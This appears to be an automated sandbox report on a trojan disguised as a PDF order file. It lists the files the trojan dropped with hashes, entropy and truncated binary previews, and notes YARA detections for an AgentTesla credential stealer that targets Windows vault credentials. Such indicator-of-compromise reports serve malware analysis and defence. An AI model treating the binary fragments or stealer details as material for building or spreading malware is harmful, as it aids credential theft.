SHA-512:	3550BA7C2B3D35C35345F655DC8BAF5AB9D423DB78CE63956EC95B77048BC2E72556A9F2575ABA5F15E2617E70DE9D001E64C7A5F10818534E81A8B3C68394CA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@...................................._..... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...P.......@...:..............@...................................................................................................................................................................................................................

C:\Program Files\Windows Media Player\wmpnetwk.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1534464
Entropy (8bit):	7.124636890144211
Encrypted:	false
SSDEEP:	24576:lSEmYD6gjGPG45QVDkfXplyTyPsqjnhMgeiCl7G0nehbGZpbD:l5mYD6g2GWQVQf3yTUDmg27RnWGj
MD5:	9694E973EBA907B9C2C60E65797EFC42
SHA1:	59BEE145E535CC35041D6475EE1E038708209EE7
SHA-256:	6E5657ED477CC146EE22909610535063298B31F4AE9550F9CD6FF650330D7269
SHA-512:	52C68316A1AAB16B64DFE2DBD651507382C79FEBF5F902F7DFFFE0D819BDA6A9CCD867D5DF792B03558201D59F434E85A845F96A5B38A16D4F72378D2F6D198E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@....................................F..... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.355496254154943
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
MD5:	3C255C75EA6EB42410894C0D08A4E324
SHA1:	34B3512313867B269C545241CD502B960213293A
SHA-256:	116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
SHA-512:	41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAI.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\TrojanAI.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAIbot.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380111671822685
Encrypted:	false
SSDEEP:	48:wWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//Zf0Uyus:wLHxvCsIfA2KRHmOugo1s
MD5:	DC22F1174769B237B56BF524B07F67BB
SHA1:	6B97D6AC2374DC93F7BDFB3023BCC115A384874D
SHA-256:	459C739CD5BA00D5457AF15005D0D05011727A49B1E352235E0D7A8C78BB60F4
SHA-512:	61F86A1C082A4859EAC3FB332F0179A3EC82218C942F5D0A9D92553149E3E11F7B63B3E9ED8BCFAD9782FED5C31F1DFC3775092AB25C8633C61470727643A33D
Malicious:	false
Reputation:	unknown
Preview:	@...e.................................X..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\TrojanAI.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0gvnjyv.3mo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdn4gelr.51i.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rtzqtgaw.ye0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tn4c1jpz.ohs.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\aut129E.tmp

Download File

Process:	C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	757248
Entropy (8bit):	7.976083400430856
Encrypted:	false
SSDEEP:	12288:2vOaWctOmu7b47HAmeXqTB6m4xD5vy0c9XDkltUidFniPV82DUf6jV7JNF6qNdjt:2vnO37U7HAmeaN6bDJc9T6zniPukUij3
MD5:	71E554BB72F6021494A36A777111225C
SHA1:	A7742D4E438722EE9E6AF78CDF96181ACBADECDA
SHA-256:	6DBC088ADB005485A1B3A3E64F151F834991CADC49CB5F997B3DC10493A86B48
SHA-512:	7595AFDBA1227F8C69C6CD667498E24D223ACD55396AEA01B238124CC71F98E2ECA4700B7C64C7F5D2EF960D5BCF89F2911757654B1B9136F7B3E0182AA4E636
Malicious:	true
Reputation:	unknown
Preview:	...T1PP3RLAI..2P.3VLAIPTrPP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VL.IPT<O.=V.H.q.3....$(:p$@?7A7!a1:\?$.4)a;%:.9>....i=;V5~>[FeIPT2PP3>\.d\|%..\|B.2m8..s/Mi=.7[..{B.2m8.n!.Mdo/7L%..b.?2.8..s+M{=.7.=Q8\|B.2AIPT2PP3VLAIPT2P...+AIPTb.P3.MEI$.2.P3VLAIPT.Ps2]MHIP.3PP._LAIPT..P3V\AIP.3PP3.LAYPT2RP3SLAIPT2PU3VLAIPT2.[3VHAI.o0PR3V.AI@T2@P3VLQIPD2PP3VLQIPT2PP3VLAI.A0P.3VLA)RTR=Y3VLAIPT2PP3VLAIPT2PP3VLAI..3PL3VLAIPT2PP3VLAIPT2PP3VLAIPT.]R3.LAIPT2PP3VLA.QT.QP3VLAIPT2PP3VLAIPT2PP3VLAI~ W($3VLY.QT2@P3V.@IPP2PP3VLAIPT2PP3vLA)~&V1$RVL.$PT2.Q3V"AIP.3PP3VLAIPT2PP3.LA.~0S$13VL.yPT2pR3VZAIP^0PP3VLAIPT2PP3.LA.~&A"33VL!$YT20R3V"HIPt0PP3VLAIPT2PP3.LA.PT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VL

C:\Users\user\AppData\Local\Temp\aut1D6B.tmp

Download File

Process:	C:\Users\user\AppData\Local\bothsided\surmit.exe
File Type:	data
Category:	dropped
Size (bytes):	757248
Entropy (8bit):	7.976083400430856
Encrypted:	false
SSDEEP:	12288:2vOaWctOmu7b47HAmeXqTB6m4xD5vy0c9XDkltUidFniPV82DUf6jV7JNF6qNdjt:2vnO37U7HAmeaN6bDJc9T6zniPukUij3
MD5:	71E554BB72F6021494A36A777111225C
SHA1:	A7742D4E438722EE9E6AF78CDF96181ACBADECDA
SHA-256:	6DBC088ADB005485A1B3A3E64F151F834991CADC49CB5F997B3DC10493A86B48
SHA-512:	7595AFDBA1227F8C69C6CD667498E24D223ACD55396AEA01B238124CC71F98E2ECA4700B7C64C7F5D2EF960D5BCF89F2911757654B1B9136F7B3E0182AA4E636
Malicious:	false
Reputation:	unknown
Preview:	...T1PP3RLAI..2P.3VLAIPTrPP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VL.IPT<O.=V.H.q.3....$(:p$@?7A7!a1:\?$.4)a;%:.9>....i=;V5~>[FeIPT2PP3>\.d\|%..\|B.2m8..s/Mi=.7[..{B.2m8.n!.Mdo/7L%..b.?2.8..s+M{=.7.=Q8\|B.2AIPT2PP3VLAIPT2P...+AIPTb.P3.MEI$.2.P3VLAIPT.Ps2]MHIP.3PP._LAIPT..P3V\AIP.3PP3.LAYPT2RP3SLAIPT2PU3VLAIPT2.[3VHAI.o0PR3V.AI@T2@P3VLQIPD2PP3VLQIPT2PP3VLAI.A0P.3VLA)RTR=Y3VLAIPT2PP3VLAIPT2PP3VLAI..3PL3VLAIPT2PP3VLAIPT2PP3VLAIPT.]R3.LAIPT2PP3VLA.QT.QP3VLAIPT2PP3VLAIPT2PP3VLAI~ W($3VLY.QT2@P3V.@IPP2PP3VLAIPT2PP3vLA)~&V1$RVL.$PT2.Q3V"AIP.3PP3VLAIPT2PP3.LA.~0S$13VL.yPT2pR3VZAIP^0PP3VLAIPT2PP3.LA.~&A"33VL!$YT20R3V"HIPt0PP3VLAIPT2PP3.LA.PT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VL

C:\Users\user\AppData\Local\Temp\aut5091.tmp

Download File

Process:	C:\Users\user\AppData\Local\bothsided\surmit.exe
File Type:	data
Category:	dropped
Size (bytes):	757248
Entropy (8bit):	7.976083400430856
Encrypted:	false
SSDEEP:	12288:2vOaWctOmu7b47HAmeXqTB6m4xD5vy0c9XDkltUidFniPV82DUf6jV7JNF6qNdjt:2vnO37U7HAmeaN6bDJc9T6zniPukUij3
MD5:	71E554BB72F6021494A36A777111225C
SHA1:	A7742D4E438722EE9E6AF78CDF96181ACBADECDA
SHA-256:	6DBC088ADB005485A1B3A3E64F151F834991CADC49CB5F997B3DC10493A86B48
SHA-512:	7595AFDBA1227F8C69C6CD667498E24D223ACD55396AEA01B238124CC71F98E2ECA4700B7C64C7F5D2EF960D5BCF89F2911757654B1B9136F7B3E0182AA4E636
Malicious:	false
Reputation:	unknown
Preview:	...T1PP3RLAI..2P.3VLAIPTrPP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VL.IPT<O.=V.H.q.3....$(:p$@?7A7!a1:\?$.4)a;%:.9>....i=;V5~>[FeIPT2PP3>\.d\|%..\|B.2m8..s/Mi=.7[..{B.2m8.n!.Mdo/7L%..b.?2.8..s+M{=.7.=Q8\|B.2AIPT2PP3VLAIPT2P...+AIPTb.P3.MEI$.2.P3VLAIPT.Ps2]MHIP.3PP._LAIPT..P3V\AIP.3PP3.LAYPT2RP3SLAIPT2PU3VLAIPT2.[3VHAI.o0PR3V.AI@T2@P3VLQIPD2PP3VLQIPT2PP3VLAI.A0P.3VLA)RTR=Y3VLAIPT2PP3VLAIPT2PP3VLAI..3PL3VLAIPT2PP3VLAIPT2PP3VLAIPT.]R3.LAIPT2PP3VLA.QT.QP3VLAIPT2PP3VLAIPT2PP3VLAI~ W($3VLY.QT2@P3V.@IPP2PP3VLAIPT2PP3vLA)~&V1$RVL.$PT2.Q3V"AIP.3PP3VLAIPT2PP3.LA.~0S$13VL.yPT2pR3VZAIP^0PP3VLAIPT2PP3.LA.~&A"33VL!$YT20R3V"HIPt0PP3VLAIPT2PP3.LA.PT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VL

C:\Users\user\AppData\Local\Temp\aut5BFB.tmp

Download File

Process:	C:\Users\user\AppData\Local\bothsided\surmit.exe
File Type:	data
Category:	dropped
Size (bytes):	757248
Entropy (8bit):	7.976083400430856
Encrypted:	false
SSDEEP:	12288:2vOaWctOmu7b47HAmeXqTB6m4xD5vy0c9XDkltUidFniPV82DUf6jV7JNF6qNdjt:2vnO37U7HAmeaN6bDJc9T6zniPukUij3
MD5:	71E554BB72F6021494A36A777111225C
SHA1:	A7742D4E438722EE9E6AF78CDF96181ACBADECDA
SHA-256:	6DBC088ADB005485A1B3A3E64F151F834991CADC49CB5F997B3DC10493A86B48
SHA-512:	7595AFDBA1227F8C69C6CD667498E24D223ACD55396AEA01B238124CC71F98E2ECA4700B7C64C7F5D2EF960D5BCF89F2911757654B1B9136F7B3E0182AA4E636
Malicious:	false
Reputation:	unknown
Preview:	...T1PP3RLAI..2P.3VLAIPTrPP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VL.IPT<O.=V.H.q.3....$(:p$@?7A7!a1:\?$.4)a;%:.9>....i=;V5~>[FeIPT2PP3>\.d\|%..\|B.2m8..s/Mi=.7[..{B.2m8.n!.Mdo/7L%..b.?2.8..s+M{=.7.=Q8\|B.2AIPT2PP3VLAIPT2P...+AIPTb.P3.MEI$.2.P3VLAIPT.Ps2]MHIP.3PP._LAIPT..P3V\AIP.3PP3.LAYPT2RP3SLAIPT2PU3VLAIPT2.[3VHAI.o0PR3V.AI@T2@P3VLQIPD2PP3VLQIPT2PP3VLAI.A0P.3VLA)RTR=Y3VLAIPT2PP3VLAIPT2PP3VLAI..3PL3VLAIPT2PP3VLAIPT2PP3VLAIPT.]R3.LAIPT2PP3VLA.QT.QP3VLAIPT2PP3VLAIPT2PP3VLAI~ W($3VLY.QT2@P3V.@IPP2PP3VLAIPT2PP3vLA)~&V1$RVL.$PT2.Q3V"AIP.3PP3VLAIPT2PP3.LA.~0S$13VL.yPT2pR3VZAIP^0PP3VLAIPT2PP3.LA.~&A"33VL!$YT20R3V"HIPt0PP3VLAIPT2PP3.LA.PT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VL

C:\Users\user\AppData\Local\Temp\lecheries

Download File

Process:	C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	757248
Entropy (8bit):	7.976083400430856
Encrypted:	false
SSDEEP:	12288:2vOaWctOmu7b47HAmeXqTB6m4xD5vy0c9XDkltUidFniPV82DUf6jV7JNF6qNdjt:2vnO37U7HAmeaN6bDJc9T6zniPukUij3
MD5:	71E554BB72F6021494A36A777111225C
SHA1:	A7742D4E438722EE9E6AF78CDF96181ACBADECDA
SHA-256:	6DBC088ADB005485A1B3A3E64F151F834991CADC49CB5F997B3DC10493A86B48
SHA-512:	7595AFDBA1227F8C69C6CD667498E24D223ACD55396AEA01B238124CC71F98E2ECA4700B7C64C7F5D2EF960D5BCF89F2911757654B1B9136F7B3E0182AA4E636
Malicious:	true
Reputation:	unknown
Preview:	...T1PP3RLAI..2P.3VLAIPTrPP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VL.IPT<O.=V.H.q.3....$(:p$@?7A7!a1:\?$.4)a;%:.9>....i=;V5~>[FeIPT2PP3>\.d\|%..\|B.2m8..s/Mi=.7[..{B.2m8.n!.Mdo/7L%..b.?2.8..s+M{=.7.=Q8\|B.2AIPT2PP3VLAIPT2P...+AIPTb.P3.MEI$.2.P3VLAIPT.Ps2]MHIP.3PP._LAIPT..P3V\AIP.3PP3.LAYPT2RP3SLAIPT2PU3VLAIPT2.[3VHAI.o0PR3V.AI@T2@P3VLQIPD2PP3VLQIPT2PP3VLAI.A0P.3VLA)RTR=Y3VLAIPT2PP3VLAIPT2PP3VLAI..3PL3VLAIPT2PP3VLAIPT2PP3VLAIPT.]R3.LAIPT2PP3VLA.QT.QP3VLAIPT2PP3VLAIPT2PP3VLAI~ W($3VLY.QT2@P3V.@IPP2PP3VLAIPT2PP3vLA)~&V1$RVL.$PT2.Q3V"AIP.3PP3VLAIPT2PP3.LA.~0S$13VL.yPT2pR3VZAIP^0PP3VLAIPT2PP3.LA.~&A"33VL!$YT20R3V"HIPt0PP3VLAIPT2PP3.LA.PT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VLAIPT2PP3VL

C:\Users\user\AppData\Local\Temp\neworigin.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	250368
Entropy (8bit):	5.008874766930935
Encrypted:	false
SSDEEP:	3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
MD5:	D6A4CF0966D24C1EA836BA9A899751E5
SHA1:	392D68C000137B8039155DF6BB331D643909E7E7
SHA-256:	DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
SHA-512:	9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.\|........................................

C:\Users\user\AppData\Local\Temp\server02.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	5.68506548460809
Encrypted:	false
